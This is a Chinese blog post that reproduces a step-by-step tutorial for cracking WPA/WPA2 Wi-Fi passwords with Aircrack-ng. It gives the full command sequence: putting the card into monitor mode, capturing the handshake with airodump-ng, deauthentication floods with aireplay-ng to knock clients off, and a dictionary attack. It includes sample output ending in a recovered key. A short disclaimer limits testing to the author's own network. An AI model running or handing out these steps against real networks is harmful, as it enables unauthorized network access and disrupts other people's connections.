破解Wifi密码的时候-2

上一篇中我说了制作生日密码的小程序,记录了一下字典的生成方式,那么这一篇中我摘抄了网上的教程,一步一步走下来,还是挺简单的。原本着想从视频中学习点东西,但是看了这篇教程以后发现文字版的更适合我~

我也希望会适合你~

PS:非法破解他人密码是违法行为,本人一切行为均在自己手机中进行。请大家测试的时候遵守法律法规。

此文分享自shellhacks

0.安装 Aircrack-ng

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

下载最新版的 Aircrack-ng

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc1.tar.gz -O - | tar -xz
$ cd aircrack-ng-1.2-rc1
$ sudo make
$ sudo make install

1.打开网卡的监听模式

首先结束可能会导致问题的进程:

$ sudo airmon-ng check kill

然后开启网卡监听模式:

$ sudo airmon-ng start wlan0

看一下现在的网卡在mon0上是打开的监听模式的。

  1. 打开Airodump-ng来收集认证信息

    $ sudo airodump-ng mon0

pic-1

然后选择特定的MAC地址进行测试:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one

pic-2

上面这条命令的运行结果是这样的:

pic-3

以下是参数的说明:

选项 说明
-c 无线网络的信道
–bssid 网络热点的MAC地址
-w 将获取到的信息储存到这些文件中
mon0 所监听的网卡
–ignore-negative-one 移除这个 ‘fixed channel : -1’ 提示信息

下图是出现握手成功的信息,注意图片右上角:

pic-handshake-successed

如果出现这个信息,就说明已经成功捕捉到握手信息了:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46  WPA handshake: 00:11:22:33:44:55

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:11:22:33:44:55  -48      212     1536   66   1  54e  WPA2 CCMP   PSK  CrackMe

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44    0 - 1    114       56

如果你等了很久,还是没有出现握手成功的信息,那么你可以试试第三步~

3.(可选)用Aireplay-ng去断开已经认证了的客户端,强制其进行重新认证以获得握手信息:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

pic-4

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one

pic-5

选项 说明
--deauth 100 发送多少拦截包(0 - 无限)
-a 热点MAC地址
-c 客户端MAC地址
mon0 监听网卡名称
--ignore-negative-one 移除 'fixed channel : -1' 提示信息

4.用Aircrack-ng破解密码:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
选项 说明
-w 字典文件
-b 热点MAC地址
WPAcrack.cap 保存有握手信息的文件
                         Aircrack-ng 1.2 beta3 r2393

                   [00:08:11] 548872 keys tested (1425.24 k/s)

                           KEY FOUND! [ 987654321 ]

      Master Key     : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 

      Transient Key  : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 

      EAPOL HMAC     : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

pic-6

comments powered by Disqus